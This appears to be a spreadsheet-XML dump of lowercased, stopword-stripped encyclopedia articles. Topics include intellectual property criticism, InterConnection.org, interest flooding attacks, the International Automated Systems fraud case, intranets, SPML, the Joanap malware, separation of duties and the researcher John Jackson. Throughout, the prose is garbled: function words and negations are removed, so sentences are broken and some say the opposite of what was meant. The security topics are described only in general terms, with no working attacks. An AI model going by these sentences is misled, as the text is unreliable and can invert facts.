lights taper mine, receives light without darkening 2005 royal society arts launched adelphi charter, aimed creating international policy statement frame governments make balanced intellectual property law.another aspect current u.s. intellectual property legislation focus individual joint works; thus, copyright protection obtained 'original' works authorship. critics like philip bennet argue provide adequate protection cultural appropriation indigenous knowledge, collective regime needed.intellectual property criticized recognizing forms remix culture, whose participants often commit technically constitutes violations laws, creation works anime music videos others, otherwise subject unnecessary burdens limitations prevent fully expressing themselves.: objections expansion nature scope intellectual property laws other criticism intellectual property concerns expansion intellectual property, duration scope. scientific knowledge expanded allowed industries arise fields biotechnology nanotechnology, originators technology sought protection technologies. patents granted living organisms, united states, certain living organisms patentable century.the increase terms protection particularly seen relation copyright, recently subject serial extensions united states europe. with need registration copyright notices, thought increase orphan works (copyrighted works copyright owner cannot contacted), problem noticed addressed governmental bodies around world.also respect copyright, american film industry helped change social construct intellectual property trade organization, motion picture association america (mpaa). amicus briefs important cases, lobbying congress, statements public, mpaa advocated strong protection intellectual property rights. framing presentations, association claimed people entitled property produced labor. additionally congress's awareness position united states world's largest producer films made convenient expand conception intellectual property. these doctrinal reforms strengthened industry, lending mpaa even power authority.the growth internet, particularly distributed search engines like kazaa gnutella, represented challenge copyright policy. recording industry association america, particular, front lines fight copyright infringement, industry calls "piracy". industry victories services, including highly publicized case file-sharing company napster, people prosecuted sharing files violation copyright. electronic seen increase attempt software-based digital rights management tools restrict copying digitally based works. laws digital millennium copyright enacted criminal prevent circumvention software used enforce digital rights management systems. equivalent provisions, prevent circumvention copyright protection existed time, expanded example, article copyright directive. other examples article software directive 1991 (91/250/eec), conditional access directive 1998 (98/84/eec). this hinder legal uses, affecting public domain works, limitations exceptions copyright, uses allowed copyright holder. some copyleft licenses, like designed counter this. laws permit circumvention specific conditions, necessary achieve interoperability circumventor's program, accessibility reasons; however, distribution circumvention tools instructions illegal. context trademarks, expansion driven international efforts harmonise definition "trademark", exemplified agreement trade-related aspects intellectual property rights ratified 1994, formalized regulations rights handled common law, all, member states. pursuant trips, sign "capable distinguishing" products services business products services another business capable constituting trademark. corporate avoidance intellectual property become core tool corporate planning avoidance. component leading multinational avoidance base erosion profit shifting (beps) tools, oecd estimates costs $100–240 billion lost annual revenues.in 2017–2018, u.s. commission simultaneously decided depart oecd beps project timetable, 2013 combat beps tools like above, launch anti-ip beps regimes: u.s. cuts jobs 2017, several anti-ip beps abuse regimes, including gilti beat regimes. commission 2018 digital services tax, less advanced u.s. tcja, seek override beps tools quasi-vat.the departure u.s. commission oecd beps project process, attributed frustrations rise beps tool, creating intangible assets, turned royalty payment beps schemes (double irish), and/or capital allowance beps schemes (capital allowances intangibles). contrast, oecd spent years developing advocating intellectual property legal gaap accounting concept. gender intellectual property women historically underrepresented intellectual property rights. according world intellectual property organization, women composed 16.5% patent holders even recently 2020. this disparity result several factors including systemic bias, sexism discrimination within intellectual property space, underrepresentation within stem, barriers access necessary finance knowledge order obtain intellectual property rights, among reasons. also copyfraud copyleft defensive publication freedom information information policy libertarian perspectives intellectual property product development references citations sources external links european audiovisual observatory hosts articles copyright legislature covers media laws newsletter internet/media piracy: statistics facts—statista</t>
  </si>
  <si>
    <t>InterConnection.org</t>
  </si>
  <si>
    <t>interconnection.org (ic) american 501(c)(3), non-profit organization headquartered seattle, washington. interconnection established 1999 charles brennick. organization's original focus developing donating websites non-profits developing countries. program soon expanded include computer donations technology training. 2004 interconnection computer reuse learning center opened seattle serve local international communities. mission interconnection's mission make information technology accessible underserved communities around world. founded belief technology power create opportunity everyone. reason works diligently proliferation information technology training. activities pursuance mission interconnection manages promotes number program activities. following four interconnection's main program activities: equipment collection technology advances many businesses, organizations individuals find outdated computer equipment dispose properly. interconnection's computer reuse learning center, seattle, washington, provides location properly dispose equipment environmentally friendly way. interconnection accepts computer equipment, regardless condition. manages programs computer recycling computer reuse. 2007 alone, interconnection kept 6,000 landfills. donations received (ic) guaranteed handled appropriately; unusable equipment recycled, viable equipment refurbished reused. this allows individuals, businesses organizations address e-waste issues simple environmentally friendly way. 501(c)(3); donations tax-deductible secure. donors provided necessary tax-deduction documentation. refurbished computers computers refurbished interconnection's low-income volunteers made available served communities around world small sourcing fee. this program creates training environment local community members also makes information technology accessible around globe. interconnection's refurbished systems create academic, professional economic opportunity people throughout developing world. interconnection's refurbished computers upgraded fully tested shipment. also provides order customization partners request. internet services interconnection's original purpose design host free websites small organizations working developing world. now, focuses primarily refurbished computer training programs. however, interconnection still provides organizations free web-design, web-hosting free email services. helping organizations create presence, able improve organizations ability communicate connect like minded groups individuals around world. partnerships computer recipients interconnection supplied 25,000 refurbished computers organizations around world. following information interconnection's computer recipients: partner organizations references external links interconnection.org interconnection's homepage kirotv news spotlight interconnection seattle weekly focus interconnection environment programme faqs e-waste</t>
  </si>
  <si>
    <t>Interest Flooding Attack</t>
  </si>
  <si>
    <t>interest flooding attack (ifa) denial-of-service attack information-centric network content-centric networking (ccn) named data networking (ndn)). attacker requests existing non-existing content order overload distribution infrastructure. this implemented sending interest packets, resolved resolved fast enough thus lead malicious memory consumption. this attack previously denoted open problem icn, heuristic countermeasures available. 2016, aubrey alston tamer refaei mitre corporation presented exact solution problem utilizes in-packet cryptographic mechanism remove ability high-volume interest traffic overload distribution infrastructure network. references</t>
  </si>
  <si>
    <t>International Automated Systems</t>
  </si>
  <si>
    <t>international automated systems, inc. (ias iaus) company research development various industries, involved many ventures design, produce, market, sell high-technology products. publicly traded since 1988, over-the-counter stock (stock symbol iaus.pk). founder major shareholder neldon johnson. currently based salem, utah, united states, founded 1987. starting 2013, iaus came fire questionable claims practices related solar power project. 2018 iaus found guilty multiple counts fraud. company, johnson, ordered million fines penalties. products solar power since 2004, international automated systems efforts developing solar powered electricity generating system, based solar heat collected patented lenses focused heat receiving system. this heat used generate steam, turns patented 'blade-less' turbines, generates electricity. prototypes system demonstrated several locations. fully functional electricity generation system construction since 2005 delta, utah. 2018, iaus found guilty operating elaborate fraud scheme. company's "solar lens" products found produce electricity, marketed mainly method obtain credits. judge david nuffer wrote: neldon johnson associates "knew reason know statements benefits purportedly related buying solar lenses false fraudulent." automated retail some products potential products international automated systems include automated retail self-service checkout system management software retail establishments. demonstration project grocery store called u-check built salem, utah. portions international automated systems' technology licensed optimal robotics undisclosed amount money. however, optimal robotics corporation previously designed implemented self-check system, reported developed completely independently international automated systems. press release optimal robotics january 2004 states: "optimal robotics corp. (nasdaq: opmr), today announced entered settlement agreement international automated systems, inc. (ias), brings close patent lawsuit parties. accordance agreement, receive considered material optimal." biometrics fingerprint identification international automated systems developed biometric device consisting automated fingerprint reader (afim automated fingerprint identification machine) able read person's fingerprint, information create specific, personalized code number, could stored small amount digital space, magnetic strip credit card. people could afim fingerprint scanners identify purchase items obtain access controlled locations devices secured way. other products company currently developing developed partially developed products airport security systems; automated restaurant systems; 'bladeless' turbines electrical power generation; solar technology systems production electricity gasoline. references external links company site story affiliate ksl.com [1]stock symbol iaus.pk</t>
  </si>
  <si>
    <t>International Carnahan Conference on Security Technology</t>
  </si>
  <si>
    <t>ieee international carnahan conference security technology (iccst) annual ieee conference related security technology, particular focus physical security, biometrics, information security, threat detection, cyber security.the 55th annual international carnahan conference security technology, originally scheduled september 2020, postponed september 2021.the conference named carnahan house, conference center university kentucky located lexington, kentucky, usa. initial conferences held location, hosted lexington chapter ieee. previous conference locations references</t>
  </si>
  <si>
    <t>International Information and Communication Technology Council Certification Program</t>
  </si>
  <si>
    <t>international council building certifications form international information communication technology council certification program. program adopting open process, volunteers communities participate. believed adopted open process enhances quality recognition certification program. certifications date updating article, certification program following series: information security officer there certifications including information security penetration testing professional (isp²) computer information forensics investigator (cifi). intellectual digital property management there currently examination intellectual digital property management (mip). linux administrator there four levels certification. beginning foundation level advanced level, namely linux administration associate (laa), linux administration professional (lap), linux administration expert (lae), linux administration master (lam). master level, several specializations including higher availability, performance tuning. linux system programmer there levels: linux system programmer associate(lspa)and linux system programmer professional (lspp) embedded linux developer certifications exist software testing there three levels including software testing associate (sta), software testing professional (stp) software testing expert (ste) examination taking council appoints authorized examination proctors. references official website certifications open training content project (otcp) government technology research alliance (gtra) partners</t>
  </si>
  <si>
    <t>International Recovery Platform</t>
  </si>
  <si>
    <t>international recovery platform (irp) joint initiative united nations agencies, international financial institutions, national local governments, non-governmental organizations engaged disaster recovery. founded 2005. came second world conference disaster reduction, support implementation hyogo framework action (hfa). group works identify address gaps recovery knowledge, practice constraints. 2015, aligned work support implementation newly adopted sendai framework disaster risk reduction. concentrated priority four building back better recovery, rehabilitation reconstruction. international recovery platform 17-member steering committee, coordinated secretariat based kobe, japan. steering committee international recovery platform partnership composed steering committee. steering committee members are: asian development bank (adb) asian disaster reduction center (adrc) cabinet office, government japan centro coordinación para prevención desastres naturales america central, punto focal regiona (cepredenac) hyogo prefectural government, japan international labour organization (ilo) ministry foreign affairs, italy swiss agency development cooperation (sdc) world bank environment united nations centre regional development (uncrd) united nations development programme (undp) united nations educational, scientific cultural organization (unesco) united nations human settlements programme (un-habitat) united nations office disaster risk reduction (undrr) united nations office project services (unops) world health organization (who) areas work international recovery forum international recovery forum annual conference organized kobe, japan every january. forum convenes senior policy makers practitioners exchange experiences facilitate discussion challenges resilient recovery, opportunities rebuilding. 2020 building back better resilient infrastructure 2019 attaining build back better dividend 2018 build back better urban resilience 2017 build back better towards resilient healthy communities 2016 sending message build back better hyogo, japan 2015 sending message building back better hyogo, japan 2014 role private sector disaster recovery 2013 resilient recovery cities municipalities: lessons integrating recovery development planning-tohoku global experiences post 2015 framework 2012 regional cooperation resilient recovery 2011 pre-disaster recovery planning building back better 2010 from resilient recovery sustainable development 2009 building back better greener -engaging partners environmentally sound recovery 2008 capacity development better recovery 2007 progress implementation hyogo framework action recovery tsunami earthquake 2006 anniversary international recovery platform 2006 lesson recovery learned recent major disasters 2005 international seminar post disaster recovery guidance notes recovery 2010, international recovery platform launched guidance notes recovery series. guidance notes conceived respond need practical resources support recovery planners, decision-makers, implementers good practices lessons gleaned past recovery efforts. since inception series, issued total thirteen volumes, organized sectors themes recovery. health supplementary edition (2017) private sector (2016) pre-disaster recovery planning (2012) climate change (2010) environment (2010) governance (2010) health (2010) infrastructure (2010) livelihoods (2010) psychosocial (2010) shelter (2010) telling live lessons (2010) references</t>
  </si>
  <si>
    <t>KIV-7</t>
  </si>
  <si>
    <t>kiv-7 national security agency type-1, single-channel encryptor originally designed mid-1990s alliedsignal corporation meet demand secure data communications personal computers (pc), workstations, faxs. data rates kbit/s interoperable kg-84, kg-84a, kg-84c data encryption devices. versions several versions kiv-7 developed years many different corporations either bought rights build kiv-7 corporate mergers. kiv-7 speeds kbit/s kiv-7 speeds (1.54 mbit/s) kiv-7hsb speeds 2.048 mbit/s kiv-7m speeds mbit/s supports high assurance internet protocol interoperability specification (haipis)(the national security agency (nsa) established high assurance internet protocol interoperability specifications (haipis) requires different vendor's inline network encryption (ine) devices interoperable.) references haipe committee national security systems (cnss policy cryptography encryption systems safenet mykotronx, manufacturer line kiv-7 devices. external links cnss policy national policy governing high assurance internet protocol encryptor (haipe) products</t>
  </si>
  <si>
    <t>Intranet</t>
  </si>
  <si>
    <t>intranet computer network sharing information, easier communication, collaboration tools, operational systems, computing services within organization, usually exclusion access outsiders. term used contrast public networks, internet, uses technology based internet protocol suite.a company-wide intranet constitute important focal point internal communication collaboration, provide single starting point access internal external resources. simplest form, intranet established technologies local area networks (lans) wide area networks (wans). many modern intranets search engines, user profiles, blogs, mobile apps notifications, events planning within infrastructure. intranet sometimes contrasted extranet. while intranet generally restricted employees organization, extranets also accessed customers, suppliers, approved parties. extranets extend private network onto internet special provisions authentication, authorization accounting (aaa protocol). uses increasingly, intranets used deliver tools, e.g. collaboration facilitate working groups teleconferencing) sophisticated corporate directories, sales customer relationship management tools, project management etc., intranets also used corporate culture-change platforms. example, large numbers employees discussing issues intranet forum application could lead ideas management, productivity, quality, corporate issues. large intranets, website traffic often similar public website traffic better understood using metrics software track overall activity. user surveys also improve intranet website effectiveness. larger businesses allow users within intranet access public internet firewall servers. they ability screen messages coming going, keeping security intact. when part intranet made accessible customers others outside business, becomes part extranet. businesses send private messages public network, using special encryption/decryption security safeguards connect part intranet another. intranet user-experience, editorial, technology teams work together produce in-house sites. most commonly, intranets managed communications, departments large organizations, combination these. because scope variety content number system interfaces, intranets many organizations much complex respective public websites. intranets growing rapidly. according intranet design annual 2007 nielsen norman group, number pages participants' intranets averaged 200,000 years 2001 2003 grown average million pages 2005–2007. benefits workforce productivity: intranets help users locate view information faster applications relevant roles responsibilities. with help browser interface, users access data held database organization wants make available, anytime subject security provisions anywhere within company workstations, increasing employees ability perform jobs faster, accurately, confidence right information. also helps improve services provided users. time: intranets allow organizations distribute information employees as-needed basis; employees link relevant information convenience, rather distracted indiscriminately email. communication: intranets serve powerful tools communication within organization, vertically strategic initiatives global reach throughout organization. type information easily conveyed purpose initiative initiative aiming achieve, driving initiative, results achieved date, speak information. providing information intranet, staff opportunity keep up-to-date strategic focus organization. some examples communication would chat, email, and/or blogs. great real-world example intranet helped company communicate nestle number food processing plants scandinavia. their central support system deal number queries every day. when nestle decided invest intranet, quickly realized savings. mcgovern says savings reduction query calls substantially greater investment intranet. publishing allows cumbersome corporate knowledge maintained easily accessed throughout company using hypermedia technologies.examples include employee manuals, benefits documents, company policies, business standards, news feeds, even training, accessed using common internet standards (acrobat files, flash files, applications). because business unit update online copy document, recent version usually available employees using intranet. business operations management: intranets also used platform developing deploying applications support business operations decisions across internetworked enterprise. workflow: collective term reduces delay, automating meeting scheduling vacation planning cost-effectiveness: users view information data web-browser rather maintaining physical documents procedure manuals, internal phone list requisition forms. this potentially save business money printing, duplicating documents, environment well document maintenance overhead. example, company peoplesoft "derived significant cost savings shifting processes intranet". mcgovern goes manual cost enrolling benefits found us$109.48 enrollment. "shifting process intranet reduced cost enrollment $21.79; saving percent". another company saved money expense reports cisco. 1996, cisco processed 54,000 reports amount dollars processed usd19 million".enhance collaboration: information easily accessible authorised users, enables teamwork. being able communicate real-time integrated third party tools, instant messenger, promotes sharing ideas removes blockages communication help boost business' productivity.cross-platform capability: standards-compliant browsers available windows, mac, unix. built audience: many companies dictate computer specifications which, turn, allow intranet developers write applications work browser cross-browser compatibility issues). being able specifically address one's "viewer" great advantage. since intranets user-specific (requiring database/network authentication prior access), users know exactly interfacing personalize intranet based role (job title, department) individual ("congratulations jane, year company!"). promote common corporate culture: every user ability view information within intranet. supports distributed computing architecture': intranet also linked company's management information system, example time keeping system. employee engagement: since "involvement decision making" main drivers employee engagement, offering tools (like forums surveys) foster peer-to-peer collaboration employee participation make employees feel valued involved. planning creation most organizations devote considerable resources planning implementation intranet strategic importance organization's success. some planning would include topics determining purpose goals intranet, identifying persons departments responsible implementation management devising functional plans, page layouts designs. appropriate staff would also ensure implementation schedules phase-out existing systems organized, defining implementing security intranet ensuring lies within legal boundaries constraints. order produce high-value product, systems planners determine level interactivity (e.g. wikis, on-line forms) desired. planners also consider whether input data updating existing data centrally controlled devolve. these decisions alongside hardware software considerations (like content management systems), participation issues (like good taste, harassment, confidentiality), features supported.intranets often static sites; shared drive, serving centrally stored documents alongside internal articles communications (often one-way communication). leveraging firms specialise 'social' intranets, organisations beginning think intranets become 'communication hub' entire team. actual implementation would include steps securing senior management support funding, conducting business requirement analysis identifying users' information needs. from technical perspective, would need co-ordinated installation server user access network, required user/client applications creation document framework template) content hosted.the end-user involved testing promoting company intranet, possibly parallel adoption methodology pilot programme. long term, company carry ongoing measurement evaluation, including benchmarking company services. maintenance some aspects non-static. staying current intranet structure needs personnel committed maintaining intranet keeping content current. feedback intranet, social networking done forum users indicate want like. privacy protection european union's general data protection regulation went effect 2018. enterprise private network enterprise private network computer network built business interconnect various company sites (such production sites, offices shops) order share computer resources. beginning digitalisation telecommunication networks, started 1970s at&amp;t, propelled growth computer systems availability demands, enterprise networks built decades without need append term private them. networks operated telecommunication networks and, voice communications, certain amount security secrecy expected delivered. internet 1990s came type network, virtual private networks, built public infrastructure, using encryption protect data traffic eaves-dropping. enterprise networks commonly referred enterprise private networks order clarify private networks, contrast public networks. also egranary digital library enterprise portal intranet portal intranet strategies intranet wiki kwangmyong (intranet) virtual workplace portal references</t>
  </si>
  <si>
    <t>IntruShield</t>
  </si>
  <si>
    <t>mcafee intrushield network-based intrusion prevention sensor appliance used prevention zero-day, (denial service) attacks, spyware, malware, botnets voip threats. called mcafee network security platform. references external links http://www.mcafee.com/us/local_content/datasheets/ds_intrushield_ips_app_ent.pdf^^ broken</t>
  </si>
  <si>
    <t>Jumio</t>
  </si>
  <si>
    <t>jumio online mobile payments identity verification company provides card scanning validation products mobile transactions, sell "netverify trusted identity service". history company founded 2010 daniel mattes, resigned april 2015 conjunction internal board investigation. december 2015, jumio informed investors financial results 2013 2014 would re-stated.in march 2016, company stated "certain legacy issues combined related government investigations proceedings made difficult jumio secure necessary funding operations." result, entering chapter restructuring proceedings.on 2016 jumio acquired centana growth partners, private equity firm specializing technology companies focus financial services references</t>
  </si>
  <si>
    <t>Service Provisioning Markup Language</t>
  </si>
  <si>
    <t>service provisioning markup language (spml) xml-based framework, developed oasis, exchanging user, resource service provisioning information cooperating organizations. service provisioning markup language open standard integration interoperation service provisioning requests. spml oasis standard based concepts directory service markup language. spml version approved october 2003. spml version approved april 2006. security assertion markup language exchanges authorization data. definition oasis provisioning services technical committee uses following definition "provisioning": provisioning automation steps required manage (setup, amend revoke) user system access entitlements data relative electronically published services. goal spml goal spml allow organizations securely quickly user interfaces services applications, letting enterprise platforms portals, application servers, service centers generate provisioning requests within across organizations. this lead automation user system access entitlement rights electronic services across diverse infrastructures, customers locked proprietary solutions. spml functionality spml version defines following functionality: core functions listtargets enables requestor determine targets provider makes available provisioning. operation enables requestor create object target. lookup lookup operation enables requestor obtain represents object target. modify modify operation enables requestor change object target. delete delete operation enables requestor remove object target. async capability cancel cancel operation enables requestor stop execution asynchronous operation. status status operation enables requestor determine whether asynchronous operation completed successfully failed still executing. batch capability batch supports batch execution requested operations. bulk capability bulkmodify allows multiple modify requests together. bulkdelete allows multiple delete requests together. password capability setpassword enables requestor specify password object. expirepassword marks invalid current password object. resetpassword enables requestor change unspecified value) password object obtain newly generated password value. validatepassword enables requestor determine whether specified value would valid password specified object. reference capability search capability search search operation obtains every object matches specified query. iterate iterate operation obtains next objects result provider selected search operation. closeiterator closeiterator operation tells provider requestor need search result specific &lt;iterator&gt; represents. suspend capability suspend suspend operation enables requestor disable object. resume resume operation enables requestor re-enable object suspended. active active operation enables requestor determine whether specified object suspended. updates capability updates updates operation obtains records changes objects. iterate iterate operation obtains next objects result provider selected updates operation. closeiterator closeiterator operation tells provider requestor need updates result specific &lt;iterator&gt; represents. custom capabilities individual provider third party) define custom capability integrates spmlv2. features provisioning service object (pso) identifier spml pso. provisioning service object (pso), sometimes simply called object, represents data entity information object target. example, provider would represent object account provider manages. every object contained exactly target. each object unique identifier (pso-id). profile spmlv2 defines “profiles” requestor provider exchange spml protocol: schema defined “spmlv2 profile” [spmlv2-profile-xsd]. dsmlv2 defined “spmlv2 dsmlv2 profile” [spmlv2-profile-dsml].a requestor provider exchange spml protocol profile agree. dsmlv2 profile convenient applications access mainly targets ldap x500 directory services. profile convenient applications access mainly targets services. references external links oasis-open.org openspml identity provisioning open source software project open provisioning tookit (openptk) keychain: open source spmlv2 gateway open source softerra spml2 library .net</t>
  </si>
  <si>
    <t>JICWEBS</t>
  </si>
  <si>
    <t>jicwebs (the joint industry committee standards) created ireland media industry ensure independence comparability measurement web. effect jicwebs works partnership abce, jicwebs deciding whether metrics desirable abce deciding whether practical.jicwebs announced formal partnership march 2017. since then, organizations aligned programs strengthen standards, avoid duplicative effort, extend reach.web metrics intended measure activity sites site centric fashion. these include measurements audience reach, frequency, activity levels including effectiveness advertising electronic media. 2020 jicwebs announced merging based trustworthy accountability group. also analytics references external links official site</t>
  </si>
  <si>
    <t>JOSSO</t>
  </si>
  <si>
    <t>java open single sign (josso) open source identity access management (iam) platform rapid standards-based cloud-scale single sign-on, services security, authentication provisioning. also shibboleth (internet2) digital certificates list single sign-on implementations external links josso home page</t>
  </si>
  <si>
    <t>Joanap</t>
  </si>
  <si>
    <t>joanap remote access tool type malware used government north korea. two-stage malware, meaning "dropped" another software case brambul worm, part charges park hyok 2018). joanap establishes peer-to-peer communications used manage botnets enable operations. windows devices compromised allows data exfiltration, drop secondary payloads, initialization proxy communications, file management, process management, creation/deletion directories, node management.the government believes hidden cobra government term malicious cyber activity conducted north korea) likely used joanap, along malware like brambul since least 2009. according government compromised addresses found argentina, belgium, brazil, cambodia, china, colombia, egypt, india, iran, jordan, pakistan, saudi arabia, spain, lanka, sweden, taiwan, tunisia. references</t>
  </si>
  <si>
    <t>Jaaga</t>
  </si>
  <si>
    <t>jaaga community space built pallet racking downtown bangalore serve local arts technology communities. history jaaga developed frustration archana prasad experienced looking suitable building samuha, artist gallery coop setting bangalore architect, naresh narasimhan, offered 1400 plot land owned richmond town across karnataka state hockey association condition vacated request. freeman murray volunteered drive construction efforts. initial frame jaaga erected august 2009. samuha found another location jaaga developed identity. physical structure jaaga free standing structure constructed pallet racking. floors plywood blockboard, external walls recycled east asian billboards. jaaga 1kva solar array draws electricity. stands square meters nets square meters useful space. because flexibility pallet racks, floors building moved reflect changing needs inhabitants. also broken quickly moved location leaving property undamaged. june 2011 jaaga structure dismantled moved location blocks away, proving nomadic nature form experimental architecture. land-owner sharath reddy keen setting experimental gaia organic cafe alongside jaaga building. this avatar jaaga twice large property three times size previous location. jaaga study jaaga study year residential program student passionate technology. startup jaaga startup incubator creative entrepreneurs. references german architects conduct workshop modular buildings everyday achievers: unusual award unsung heroes affiliated spaces groups bangalore samuha bar1 goethe institute</t>
  </si>
  <si>
    <t>Separation of duties</t>
  </si>
  <si>
    <t>separation duties (sod), also known segregation duties concept person required complete task. administrative control used organisations prevent fraud, sabotage, theft, misuse information, security compromises. political realm, known separation powers, seen democracies government separated three independent branches: legislature, executive, judiciary. general description separation duties concept internal controls. increased protection fraud errors must balanced increased cost/effort required. essence, implements appropriate level checks balances upon activities individuals. botha eloff systems journal describe follows. separation duty, security principle, primary objective prevention fraud errors. this objective achieved disseminating tasks associated privileges specific business process among multiple users. this principle demonstrated traditional example separation duty found requirement signatures cheque. actual titles organizational structure vary greatly organization another, depending size nature business. accordingly, rank hierarchy less important skillset capabilities individuals involved. with concept sod, business critical duties categorized four types functions: authorization, custody, record keeping, reconciliation. perfect system, person handle type function. principles principally several approaches optionally viable partially entirely different paradigms: sequential separation (two signatures principle) individual separation (four eyes principle) spatial separation (separate action separate locations) factorial separation (several factors contribute completion) auxiliary patterns person multiple functional roles opportunity abuse powers. pattern minimize risk start function indispensable, potentially subject abuse. divide function separate steps, necessary function work power enables function abused. assign step different person organization.general categories functions separated: authorization function recording function, e.g. preparing source documents code performance reports custody asset whether directly indirectly, e.g. receiving checks mail implementing source code database changes. reconciliation audit splitting security (more) parts responsible personsprimarily individual separation addressed selection. application general business accounting term already well known financial accounting systems. companies sizes understand combine roles receiving cheques (payment account) approving write-offs, depositing cash reconciling bank statements, approving time cards custody cheques, etc. fairly information technology (it) departments, high percentage sarbanes-oxley internal audit issues come it.in information systems, segregation duties helps reduce potential damage actions person. end-user department organized achieve adequate separation duties. according isaca's segregation duties control matrix, duties combined position. this matrix industry standard, general guideline suggesting positions separated require compensating controls combined. depending company's size, functions designations vary. when duties cannot separated, compensating controls place. compensating controls internal controls intended reduce risk existing potential control weakness. single person carry conceal errors and/or irregularities course performing day-to-day activities, assigned incompatible duties. there several control mechanisms help enforce segregation duties: audit trails enable managers auditors recreate actual transaction flow point origination existence updated file. good audit trails enabled provide information initiated transaction, time date entry, type entry, fields information contained, files updated. reconciliation applications independent verification process ultimately responsibility users, used increase level confidence application successfully. exception reports handled supervisory level, backed evidence noting exceptions handled properly timely fashion. signature person prepares report normally required. manual automated system application transaction logs maintained, record processed system commands application transactions. supervisory review performed observation inquiry. compensate mistakes intentional failures following prescribed procedure, independent reviews recommended. such reviews help detect errors irregularities. application information systems accounting profession invested significantly separation duties understood risks accumulated hundreds years accounting practice. contrast, many corporations united states found unexpectedly high proportion sarbanes-oxley internal control issues came separation duties commonly used large organizations single person position introduce fraudulent malicious code data without detection. role-based access control frequently used systems required. strict control software data changes require person organizations performs following roles: identification requirement change request); e.g. business person authorization approval; e.g. governance board manager design development; e.g. developer review, inspection approval; e.g. another developer architect. implementation production; typically software change system administrator.this exhaustive presentation software development life cycle, list critical development functions applicable separation duties. successfully implement separation duties information systems number concerns need addressed: process used ensure person's authorization rights system line role organization. authentication method used knowledge password, possession object (key, token) biometrical characteristic. circumvention rights system occur database administration access, user administration access, tools provide back-door access supplier installed user accounts. specific controls review activity required address specific concern. references external links nick szabo's essay separation duties wayback machine (archived march 2016) "segregation/separation duties definition", isaca "segregate duties lessen security risks", datamation "transparency, partitioning, separation, rotation supervision responsibilities", ism3</t>
  </si>
  <si>
    <t>Jamie Bartlett (journalist)</t>
  </si>
  <si>
    <t>jamie bartlett british author journalist, primarily spectator daily telegraph. senior fellow demos served director centre analysis social media demos 2017. education bartlett educated state comprehensive school chatham, kent scholarship study university oxford went master's degree london school economics. career 2013, covered rise beppe grillo's five star movement italy demos, chronicling political force's emergence social media.in 2014, bartlett released first full-length book, dark net. book discusses darknet dark broad terms, describing range underground emergent subcultures, including social media racists, camgirls, self-harm communities, darknet drug markets, crypto-anarchists transhumanists.bartlett frequently written online extremism free speech, well social media trends wikipedia, twitter facebook.in 2017, published second book radicals chasing utopia, covered fringe political movements including transhumanism, psychedelic societies anarcho-capitalism. also presented part series secrets silicon valley.bartlett's third book, people tech, released 2018. argued "our fragile political system threatened digital revolution."in 2019 co-wrote presented podcast series missing cryptoqueen, investigated disappearance ruja ignatova, founder fake cryptocurrency onecoin. podcast also examines onecoin operates, human social cost. references</t>
  </si>
  <si>
    <t>John Jackson (hacker)</t>
  </si>
  <si>
    <t>john jackson (born 1994 1995), also known hacking, american security researcher founder white-hat hacking group sakura samurai. early career education jackson served marine corps 2012 2017, petroleum engineer logistics manager. discharged military suffering injury, began attending leaderquest colorado certification bootcamp. after studying leaderquest learning own, earned several cybersecurity certificates including itil, comptia security+, ec-council certified network defender (cnd) certified ethical hacker (ceh). career jackson's first cybersecurity staples endpoint detection response engineer. jackson became application security engineer shutterstock 2019 2021, involved maintaining security applications, managing bounty program, managing static dynamic application security testing tools. while employed shutterstock, also worked penetration tester 1337 inc. bounty hunting spare time. independent research march 2020, jackson published blog post vulnerability discovered talkspace mental health app, told company issue dismissed. talkspace sent cease desist letter shortly post published, techcrunch described "just latest example security researchers facing legal threats work".in november 2020, jackson researcher sick.codes discovered vulnerabilities brand televisions. first would allow attackers adjacent network access system files, potentially leading critical information disclosure. second would allow attackers read write files vendor resources directories, could allow arbitrary code execution enable attackers compromise systems network. after jackson sick.codes reported vulnerability tcl, deployed patch—however, jackson researcher partner said raised concerns, notification software updated, appeared full control device. vulnerability came described media "chinese backdoor". december 2021 speech heritage foundation, acting department homeland security secretary chad wolf said agency investigating vulnerability concerns chinese manufacturer "expos[ed] users cyber breaches data exfiltration".also november 2020, jackson found server-side request forgery vulnerability private-ip, popular javascript library published npm. march 2021, jackson researchers discovered similar netmask, package used around 278,000 software projects. existed nine years. april 2021, group discovered flaw existed python ipaddress standard library, broadly affecting languages perl, rust.in december 2020, jackson nick sahler reported gained access large quantity sensitive data associated children's website neopets. data included database credentials, employee emails, website source code.in september 2021, jackson sick.codes disclosed vulnerability found gurock's test management tool testrail, improper access control would allow access list application files file paths, could potentially expose sensitive data hardcoded credentials keys. sakura samurai 2020, jackson nick sahler founded sakura samurai, white-hat hacking security research group. other current former members group included robert willis, aubrey cottle, higinio ochoa.in january 2021, jackson members sakura samurai publicly reported discovered exposed directories credential files domains belonging groups within united nations. vulnerability exposed 100,000 private employee records.in march 2021, jackson others group publicly disclosed vulnerabilities affected groups within indian government. after finding exposed configuration directories, sakura samurai able access credentials critical applications, 13,000 personal records, police reports, data. group also discovered vulnerabilities relating session hijacking arbitrary code execution finance-related governmental systems. after issues reported india's national critical information infrastructure protection centre went unaddressed several weeks, sakura samura involved u.s. department defense vulnerability disclosure program, issues remediated.jackson sakura samurai members found vulnerability pegasystems' pega infinity enterprise software suite, used customer engagement digital process automation. vulnerability, first reported pegasystems february 2021, involved possible misconfiguration would enable data exposure. vulnerability researchers breaching systems belonging ford motor company john deere, incidents publicly disclosed august 2021.jackson members sakura samurai also reported notable vulnerabilities related organizations software including apache velocity, keybase, fermilab. publications jackson, john (december 2021). corporate cybersecurity: identifying risks bounty program. wiley. isbn 978-1119782520. references external links official website</t>
  </si>
  <si>
    <t>Jericho Forum</t>
  </si>
  <si>
    <t>jericho forum international group working define promote de-perimeterisation. initiated david lacey royal mail, grew loose affiliation interested corporate cisos (chief information security officers), discussing topic summer 2003, initial meeting hosted cisco, officially founded january 2004. declared success, merged open group industry consortium's security forum 2014. problem created founding members claimed else appropriately discussing problems surrounding de-perimeterisation. they felt need create forum define solve consistently issues. earlier outputs group position paper entitled jericho forum commandments principles describe best survive de-perimeterised world. membership jericho forum consisted "user members" "vendor members". originally, user members allowed stand election. december 2008 relaxed, allowing either vendor user members eligible election. day-to-day management provided open group. while jericho forum foundations nearly initial members worked corporates global responsibilities, involvement grew europe, north america asia pacific. results after initial focus defining problem, de-perimeterisation, forum moved onto focussing defining solution, delivered publication collaboration oriented architecture (coa) paper framework paper. next focus jericho forum "securely collaborating clouds", involves applying concepts emerging cloud computing paradigm. basic premise collaborative approach essential gain value "the cloud". much work transferred cloud security alliance "guidance" document. final (major) piece jericho forum's work (from 2009) around identity, culminating 2011 publication identity, entitlement access management commandments.in final months jericho forum contributed thinking debate around "smart data" handed 